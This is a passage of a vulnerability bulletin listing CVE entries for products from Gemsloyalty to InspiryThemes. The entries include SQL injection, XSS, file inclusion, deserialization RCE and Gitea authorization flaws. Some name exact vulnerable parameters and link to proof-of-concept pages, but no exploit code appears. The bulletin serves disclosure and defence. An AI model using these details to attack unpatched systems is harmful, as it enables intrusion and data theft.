| gemsloyalty--gemsloyalty | A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all available backend services and POS web services, each with an HTML form for submitting test input. These panels are intended for developer use, but are accessible in production environments with no authentication or session validation. This grants any external actor the ability to discover, test, and execute API endpoints that perform critical functions including but not limited to user transaction retrieval, credit adjustments, POS actions, and internal data queries. | 2026-01-23 | not yet calculated | CVE-2025-52024 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| gemsloyalty--gemsloyalty | An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without proper sanitization or parameterization. This allows an attacker to inject and execute arbitrary SQL code by submitting crafted input in the id parameter, leading to unauthorized data access or modification. | 2026-01-23 | not yet calculated | CVE-2025-52025 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| Genetech Products--Pie Register | Missing Authorization vulnerability in Genetech Products Pie Register pie-register allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Pie Register: from n/a through <= 3.8.4.7. | 2026-01-23 | not yet calculated | CVE-2026-24577 | https://patchstack.com/database/Wordpress/Plugin/pie-register/vulnerability/wordpress-pie-register-plugin-3-8-4-7-broken-access-control-vulnerability?_s_id=cve |
| Get-Simple--My SMTP Contact Plugin | GetSimple CMS My SMTP Contact Plugin 1.1.2 contains a PHP code injection vulnerability. An authenticated administrator can inject arbitrary PHP code through plugin configuration parameters, leading to remote code execution on the server. | 2026-01-21 | not yet calculated | CVE-2021-47778 | ExploitDB-49774 Vendor Homepage GetSimple CMS GitHub Repository Full Disclosure Repository VulnCheck Advisory: GetSimple CMS My SMTP Contact Plugin 1.1.2 - PHP Code Injection |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to version 1.13.2, unauthenticated requests could be proxied to remote environment agents, allowing access to remote environment resources without authentication. The environment proxy middleware handled `/api/environments/{id}/...` requests for remote environments before authentication was enforced. When the environment ID was not local, the middleware proxied the request and attached the manager-held agent token, even if the caller was unauthenticated. This enabled unauthenticated access to remote environment operations (e.g., listing containers, streaming logs, or other agent endpoints). An unauthenticated attacker could access and manipulate remote environment resources via the proxy, potentially leading to data exposure, unauthorized changes, or service disruption. Version 1.13.2 patches the vulnerability. | 2026-01-19 | not yet calculated | CVE-2026-23944 | https://github.com/getarcaneapp/arcane/security/advisories/GHSA-2jv8-39rp-cqqr https://github.com/getarcaneapp/arcane/pull/1532 https://github.com/getarcaneapp/arcane/commit/2008e1b93b25d0c4c3fff3af07843766231614eb https://github.com/getarcaneapp/arcane/releases/tag/v1.13.2 |
| GetSimple CMS--My SMTP Contact Plugin | GetSimple CMS My SMTP Contact Plugin 1.1.1 contains a cross-site request forgery (CSRF) vulnerability. Attackers can craft a malicious webpage that, when visited by an authenticated administrator, can change SMTP configuration settings in the plugin. This may allow unauthorized changes but does not directly enable remote code execution. | 2026-01-21 | not yet calculated | CVE-2021-47830 | ExploitDB-49774 ExploitDB-49798 GetSimple CMS Webpage GetSimple CMS GitHub Repository VulnCheck Advisory: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF |
| GetSimple CMS--My SMTP Contact Plugin | GetSimple CMS My SMTP Contact Plugin 1.1.2 suffers from a Stored Cross-Site Scripting (XSS) vulnerability. The plugin attempts to sanitize user input using htmlspecialchars(), but this can be bypassed by passing dangerous characters as escaped hex bytes. This allows attackers to inject arbitrary client-side code that executes in the administrator's browser when visiting a malicious page. | 2026-01-21 | not yet calculated | CVE-2021-47870 | Full Disclosure Repository Vendor Homepage GetSimple CMS GitHub Repository ExploitDB-49798 VulnCheck Advisory: GetSimple CMS My SMTP Contact Plugin 1.1.2 - Stored XSS |
| GIMP--GIMP | GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28232. | 2026-01-23 | not yet calculated | CVE-2025-15059 | ZDI-25-1196 vendor-provided URL |
| Gitea--Gitea Open Source Git Server | Gitea may send release notification emails for private repositories to users whose access has been revoked. When a repository is changed from public to private, users who previously watched the repository may continue to receive release notifications, potentially disclosing release titles, tags, and content. | 2026-01-22 | not yet calculated | CVE-2026-0798 | GitHub Security Advisory GitHub Pull Request #36319 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly verify repository context when deleting attachments. A user who previously uploaded an attachment to a repository may be able to delete it after losing access to that repository by making the request through a different repository they can access. | 2026-01-22 | not yet calculated | CVE-2026-20736 | GitHub Security Advisory GitHub Pull Request #36320 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization. | 2026-01-22 | not yet calculated | CVE-2026-20750 | GitHub Security Advisory GitHub Pull Request #36318 GitHub Pull Request #36373 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea's notification API does not re-validate repository access permissions when returning notification details. After a user's access to a private repository is revoked, they may still view issue and pull request titles through previously received notifications. | 2026-01-22 | not yet calculated | CVE-2026-20800 | GitHub Security Advisory GitHub Pull Request #36339 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea's stopwatch API does not re-validate repository access permissions. After a user's access to a private repository is revoked, they may still view issue titles and repository names through previously started stopwatches. | 2026-01-22 | not yet calculated | CVE-2026-20883 | GitHub Security Advisory GitHub Pull Request #36340 GitHub Pull Request #36368 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface. A user with read access to pull requests may be able to cancel auto-merges scheduled by other users. | 2026-01-22 | not yet calculated | CVE-2026-20888 | GitHub Security Advisory GitHub Pull Request #36341 GitHub Pull Request #36356 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate repository ownership when deleting Git LFS locks. A user with write access to one repository may be able to delete LFS locks belonging to other repositories. | 2026-01-22 | not yet calculated | CVE-2026-20897 | GitHub Security Advisory GitHub Pull Request #36344 GitHub Pull Request #36349 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate ownership when toggling OpenID URI visibility. An authenticated user may be able to change the visibility settings of other users' OpenID identities. | 2026-01-22 | not yet calculated | CVE-2026-20904 | GitHub Security Advisory GitHub Pull Request #36346 GitHub Pull Request #36361 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate repository ownership when linking attachments to releases. An attachment uploaded to a private repository could potentially be linked to a release in a different public repository, making it accessible to unauthorized users. | 2026-01-22 | not yet calculated | CVE-2026-20912 | GitHub Security Advisory GitHub Pull Request #36320 GitHub Pull Request #36355 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| github-kanban-mcp-server--github-kanban-mcp-server | github-kanban-mcp-server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of github-kanban-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the create_issue parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27784. | 2026-01-23 | not yet calculated | CVE-2026-0756 | ZDI-26-022 |
| GLS--GLS Shipping for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GLS GLS Shipping for WooCommerce gls-shipping-for-woocommerce allows Reflected XSS. This issue affects GLS Shipping for WooCommerce: from n/a through <= 1.4.0. | 2026-01-22 | not yet calculated | CVE-2025-68011 | https://patchstack.com/database/Wordpress/Plugin/gls-shipping-for-woocommerce/vulnerability/wordpress-gls-shipping-for-woocommerce-plugin-1-3-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| goalthemes--Bailly | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Bailly bailly allows PHP Local File Inclusion. This issue affects Bailly: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69039 | https://patchstack.com/database/Wordpress/Theme/bailly/vulnerability/wordpress-bailly-theme-1-3-4-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Bfres | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Bfres bfres allows PHP Local File Inclusion. This issue affects Bfres: from n/a through <= 1.2.1. | 2026-01-22 | not yet calculated | CVE-2025-69040 | https://patchstack.com/database/Wordpress/Theme/bfres/vulnerability/wordpress-bfres-theme-1-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Dekoro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Dekoro dekoro allows PHP Local File Inclusion. This issue affects Dekoro: from n/a through <= 1.0.7. | 2026-01-22 | not yet calculated | CVE-2025-69041 | https://patchstack.com/database/Wordpress/Theme/dekoro/vulnerability/wordpress-dekoro-theme-1-0-7-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Hyori | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Hyori hyori allows PHP Local File Inclusion. This issue affects Hyori: from n/a through <= 1.3.6. | 2026-01-22 | not yet calculated | CVE-2025-69038 | https://patchstack.com/database/Wordpress/Theme/hyori/vulnerability/wordpress-hyori-theme-1-3-6-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Lindo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Lindo lindo allows PHP Local File Inclusion. This issue affects Lindo: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2025-69042 | https://patchstack.com/database/Wordpress/Theme/lindo/vulnerability/wordpress-lindo-theme-1-2-5-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Pippo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Pippo pippo allows PHP Local File Inclusion. This issue affects Pippo: from n/a through <= 1.2.3. | 2026-01-22 | not yet calculated | CVE-2025-69037 | https://patchstack.com/database/Wordpress/Theme/pippo/vulnerability/wordpress-pippo-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Rashy | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Rashy rashy allows PHP Local File Inclusion. This issue affects Rashy: from n/a through <= 1.1.3. | 2026-01-22 | not yet calculated | CVE-2025-69043 | https://patchstack.com/database/Wordpress/Theme/rashy/vulnerability/wordpress-rashy-theme-1-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Vango | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Vango vango allows PHP Local File Inclusion. This issue affects Vango: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-69044 | https://patchstack.com/database/Wordpress/Theme/vango/vulnerability/wordpress-vango-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| Google--Chrome | Out of bounds memory access in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2026-01-20 | not yet calculated | CVE-2026-0899 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/458914193 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2026-01-20 | not yet calculated | CVE-2026-0900 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/465730465 |
| Google--Chrome | Inappropriate implementation in Blink in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-01-20 | not yet calculated | CVE-2026-0901 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/40057499 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0902 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/469143679 |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome on Windows prior to 144.0.7559.59 allowed a remote attacker to bypass dangerous file type protections via a malicious file. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0903 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/444803530 |
| Google--Chrome | Incorrect security UI in Digital Credentials in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0904 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/452209495 |
| Google--Chrome | Insufficient policy enforcement in Network in Google Chrome prior to 144.0.7559.59 allowed an attacker who obtained a network log file to obtain potentially sensitive information via that network log file. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0905 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/465466773 |
| Google--Chrome | Incorrect security UI in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low) | 2026-01-20 | not yet calculated | CVE-2026-0906 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/467448811 |
| Google--Chrome | Incorrect security UI in Split View in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-01-20 | not yet calculated | CVE-2026-0907 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/444653104 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) | 2026-01-20 | not yet calculated | CVE-2026-0908 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/452209503 |
| Google--Sentencepiece | Invalid memory access in Sentencepiece versions less than 0.2.1 when using a vulnerable model file, which is not created in the normal training procedure. | 2026-01-22 | not yet calculated | CVE-2026-1260 | https://github.com/google/sentencepiece/releases/tag/v0.2.1 |
| GPT Academic--GPT Academic | GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the stream_daas function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27956. | 2026-01-23 | not yet calculated | CVE-2026-0762 | ZDI-26-028 |
| GPT Academic--GPT Academic | GPT Academic run_in_subprocess_wrapper_func Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the run_in_subprocess_wrapper_func function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27958. | 2026-01-23 | not yet calculated | CVE-2026-0763 | ZDI-26-029 |
| GPT Academic--GPT Academic | GPT Academic upload Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upload endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27957. | 2026-01-23 | not yet calculated | CVE-2026-0764 | ZDI-26-030 |
| gregmolnar--Simple XML Sitemap | Cross-Site Request Forgery (CSRF) vulnerability in gregmolnar Simple XML Sitemap simple-xml-sitemap allows Stored XSS. This issue affects Simple XML Sitemap: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22355 | https://patchstack.com/database/Wordpress/Plugin/simple-xml-sitemap/vulnerability/wordpress-simple-xml-sitemap-plugin-1-3-csrf-to-stored-xss-vulnerability?_s_id=cve |
| Hangzhou Kuozhi Network Technology Co., Ltd.--EduSoho | EduSoho versions prior to 22.4.7 contain an arbitrary file read vulnerability in the classroom-course-statistics export functionality. A remote, unauthenticated attacker can supply crafted path traversal sequences in the fileNames[] parameter to read arbitrary files from the server filesystem, including application configuration files such as config/parameters.yml that may contain secrets and database credentials. Exploitation evidence was observed by the Shadowserver Foundation on 2026-01-19 (UTC). | 2026-01-22 | not yet calculated | CVE-2023-7335 | https://www.edusoho.com/ https://github.com/edusoho/edusoho/releases/tag/v22.4.7 https://cn-sec.com/archives/2451582.html https://blog.csdn.net/qq_41904294/article/details/135007351 https://github.com/zeroChen00/exp-poc/blob/main/EduSoho%E6%95%99%E5%9F%B9%E7%B3%BB%E7%BB%9Fclassropm-course-statistics%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md https://github.com/gobysec/GobyVuls/blob/master/CNVD-2023-03903.md https://www.cnvd.org.cn/flaw/show/CNVD-2023-03903 https://www.vulncheck.com/advisories/edusoho-arbitrary-file-read-via-classroom-course-statistics |
| HappyMonster--Happy Addons for Elementor | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HappyMonster Happy Addons for Elementor happy-elementor-addons allows Blind SQL Injection. This issue affects Happy Addons for Elementor: from n/a through <= 3.20.4. | 2026-01-22 | not yet calculated | CVE-2025-68999 | https://patchstack.com/database/Wordpress/Plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-4-sql-injection-vulnerability?_s_id=cve |
| Harmonic Design--HD Quiz | Missing Authorization vulnerability in Harmonic Design HD Quiz hd-quiz allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HD Quiz: from n/a through <= 2.0.9. | 2026-01-23 | not yet calculated | CVE-2026-24544 | https://patchstack.com/database/Wordpress/Plugin/hd-quiz/vulnerability/wordpress-hd-quiz-plugin-2-0-9-broken-access-control-vulnerability?_s_id=cve |
| Harmonic Design--HDForms | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Harmonic Design HDForms hdforms allows Path Traversal. This issue affects HDForms: from n/a through <= 1.6.1. | 2026-01-22 | not yet calculated | CVE-2025-68912 | https://patchstack.com/database/Wordpress/Plugin/hdforms/vulnerability/wordpress-hdforms-plugin-1-6-1-arbitrary-file-deletion-vulnerability?_s_id=cve |
| hassantafreshi--Easy Form Builder | Missing Authorization vulnerability in hassantafreshi Easy Form Builder easy-form-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Form Builder: from n/a through <= 3.9.6. | 2026-01-22 | not yet calculated | CVE-2026-22472 | https://patchstack.com/database/Wordpress/Plugin/easy-form-builder/vulnerability/wordpress-easy-form-builder-plugin-3-9-4-broken-access-control-vulnerability?_s_id=cve |
| hexpm--hexpm | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in hexpm hexpm/hexpm ('Elixir.HexpmWeb.SharedAuthorizationView' modules) allows Cross-Site Scripting (XSS). This vulnerability is associated with program files lib/hexpm_web/views/shared_authorization_view.ex and program routines 'Elixir.HexpmWeb.SharedAuthorizationView':render_grouped_scopes/3. This issue affects hexpm: from 617e44c71f1dd9043870205f371d375c5c4d886d before c692438684ead90c3bcbfb9ccf4e63c768c668a8, from pkg:github/hexpm/hexpm@617e44c71f1dd9043870205f371d375c5c4d886d before pkg:github/hexpm/hexpm@c692438684ead90c3bcbfb9ccf4e63c768c668a8; hex.pm: from 2025-10-01 before 2026-01-19. | 2026-01-19 | not yet calculated | CVE-2026-21618 | https://github.com/hexpm/hexpm/security/advisories/GHSA-6cw9-5gg4-rhpj https://github.com/hexpm/hexpm/commit/c692438684ead90c3bcbfb9ccf4e63c768c668a8 |
| highwarden--Super Interactive Maps | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in highwarden Super Interactive Maps super-interactive-maps allows Reflected XSS. This issue affects Super Interactive Maps: from n/a through <= 2.3. | 2026-01-22 | not yet calculated | CVE-2025-49045 | https://patchstack.com/database/Wordpress/Plugin/super-interactive-maps/vulnerability/wordpress-super-interactive-maps-plugin-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| highwarden--Super Logos Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in highwarden Super Logos Showcase superlogoshowcase-wp allows Reflected XSS. This issue affects Super Logos Showcase: from n/a through <= 2.8. | 2026-01-22 | not yet calculated | CVE-2025-69054 | https://patchstack.com/database/Wordpress/Plugin/superlogoshowcase-wp/vulnerability/wordpress-super-logos-showcase-plugin-2-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Horea Radu--Materialis Companion | Missing Authorization vulnerability in Horea Radu Materialis Companion materialis-companion allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Materialis Companion: from n/a through <= 1.3.52. | 2026-01-23 | not yet calculated | CVE-2026-24543 | https://patchstack.com/database/Wordpress/Plugin/materialis-companion/vulnerability/wordpress-materialis-companion-plugin-1-3-52-broken-access-control-vulnerability?_s_id=cve |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). A critical File Upload vulnerability in versions prior to 1.5.0, with Social Engineering, allows authenticated users to deploy phishing attacks. By uploading a malicious HTML file disguised as a profile picture, an attacker can create a convincing login page replica that steals user credentials. When a victim visits the uploaded file URL, they see an authentic-looking "Session Expired" message prompting them to re-authenticate. All entered credentials are captured and sent to the attacker's server, enabling Account Takeover. Version 1.5.0 patches the issue. | 2026-01-22 | not yet calculated | CVE-2026-24010 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-5jfv-gw8w-49h3 https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| Hossni Mubarak--JobWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hossni Mubarak JobWP jobwp allows Stored XSS. This issue affects JobWP: from n/a through <= 2.4.5. | 2026-01-22 | not yet calculated | CVE-2025-69318 | https://patchstack.com/database/Wordpress/Plugin/jobwp/vulnerability/wordpress-jobwp-plugin-2-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hotwired Turbo--Hotwire Turbo | Race condition in the turbo-frame element handler in Hotwired Turbo before 8.0.x causes logout operations to fail when delayed frame responses reapply session cookies after logout. This can be exploited by remote attackers via selective network delays (e.g. delaying requests based on sequence or timing) or by physically proximate attackers when the race condition occurs naturally on shared computers. | 2026-01-20 | not yet calculated | CVE-2025-66803 | https://github.com/hotwired/turbo/pull/1399 https://turbo.hotwired.dev/handbook/frames https://github.com/hotwired/turbo/security/advisories/GHSA-qppm-g56g-fpvp |
| Hubitat--Elevation C3 | An Authorization Bypass Through User-Controlled Key vulnerability in Hubitat Elevation home automation controllers prior to version 2.4.2.157 could allow a remote authenticated user to control connected devices outside of their authorized scope via client-side request manipulation. | 2026-01-22 | not yet calculated | CVE-2026-1201 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-06 |
| Hyyan Abo Fakher--Hyyan WooCommerce Polylang Integration | Missing Authorization vulnerability in Hyyan Abo Fakher Hyyan WooCommerce Polylang Integration woo-poly-integration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hyyan WooCommerce Polylang Integration: from n/a through <= 1.5.0. | 2026-01-23 | not yet calculated | CVE-2026-24585 | https://patchstack.com/database/Wordpress/Plugin/woo-poly-integration/vulnerability/wordpress-hyyan-woocommerce-polylang-integration-plugin-1-5-0-broken-access-control-vulnerability?_s_id=cve |
| Icegram--Icegram | Missing Authorization vulnerability in Icegram Icegram icegram allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Icegram: from n/a through <= 3.1.35. | 2026-01-22 | not yet calculated | CVE-2025-68507 | https://patchstack.com/database/Wordpress/Plugin/icegram/vulnerability/wordpress-icegram-plugin-3-1-35-broken-access-control-vulnerability?_s_id=cve |
| ichurakov--Paid Downloads | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ichurakov Paid Downloads paid-downloads allows Blind SQL Injection. This issue affects Paid Downloads: from n/a through <= 3.15. | 2026-01-22 | not yet calculated | CVE-2025-68857 | https://patchstack.com/database/Wordpress/Plugin/paid-downloads/vulnerability/wordpress-paid-downloads-plugin-3-15-sql-injection-vulnerability?_s_id=cve |
| ilmosys--Order Listener for WooCommerce | Missing Authorization vulnerability in ilmosys Order Listener for WooCommerce woc-order-alert allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Order Listener for WooCommerce: from n/a through <= 3.6.1. | 2026-01-22 | not yet calculated | CVE-2025-68018 | https://patchstack.com/database/Wordpress/Plugin/woc-order-alert/vulnerability/wordpress-order-listener-for-woocommerce-plugin-3-6-0-broken-access-control-vulnerability?_s_id=cve |
| Imaginate Solutions--File Uploads Addon for WooCommerce | Missing Authorization vulnerability in Imaginate Solutions File Uploads Addon for WooCommerce woo-addon-uploads allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects File Uploads Addon for WooCommerce: from n/a through <= 1.7.3. | 2026-01-23 | not yet calculated | CVE-2026-24625 | https://patchstack.com/database/Wordpress/Plugin/woo-addon-uploads/vulnerability/wordpress-file-uploads-addon-for-woocommerce-plugin-1-7-3-broken-access-control-vulnerability?_s_id=cve |
| Imagination Technologies--Graphics DDK | A web page containing unusual GPU shader code that is loaded from the Internet into the GPU compiler process can trigger a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges, this could enable further exploits on the device. The shader code in the web page executes a path in the compiler that holds onto an out-of-date pointer to a freed memory object. | 2026-01-24 | not yet calculated | CVE-2025-13952 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imran Emu--Owl Carousel WP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Imran Emu Owl Carousel WP owl-carousel-wp allows Stored XSS. This issue affects Owl Carousel WP: from n/a through <= 2.2.2. | 2026-01-22 | not yet calculated | CVE-2026-22388 | https://patchstack.com/database/Wordpress/Plugin/owl-carousel-wp/vulnerability/wordpress-owl-carousel-wp-plugin-2-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| iNET--iNET Webkit | Missing Authorization vulnerability in iNET iNET Webkit inet-webkit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects iNET Webkit: from n/a through <= 1.2.4. | 2026-01-23 | not yet calculated | CVE-2026-24566 | https://patchstack.com/database/Wordpress/Plugin/inet-webkit/vulnerability/wordpress-inet-webkit-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| Infility--Infility Global | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infility Infility Global infility-global allows Stored XSS. This issue affects Infility Global: from n/a through <= 2.14.50. | 2026-01-22 | not yet calculated | CVE-2025-68864 | https://patchstack.com/database/Wordpress/Plugin/infility-global/vulnerability/wordpress-infility-global-plugin-2-14-49-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Inkscape--Inkscape | The macOS version of Inkscape bundles a Python interpreter that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle. An attacker with local user access can invoke this interpreter with arbitrary commands or scripts, leveraging the application's previously granted TCC permissions to access the user's files in privacy-protected folders without triggering user prompts. Accessing other resources beyond the previously granted TCC permissions will prompt the user for approval in the name of Inkscape, potentially disguising the attacker's malicious intent. This issue has been fixed in Inkscape version 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-15523 | https://inkscape.org/ https://cert.pl/en/posts/2026/01/CVE-2025-15523/ |
| InspiryThemes--Real Homes CRM | Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes Real Homes CRM realhomes-crm allows Using Malicious Files. This issue affects Real Homes CRM: from n/a through <= 1.0.0. | 2026-01-22 | not yet calculated | CVE-2025-67968 | https://patchstack.com/database/Wordpress/Plugin/realhomes-crm/vulnerability/wordpress-real-homes-crm-plugin-1-0-0-arbitrary-file-upload-vulnerability?_s_id=cve |
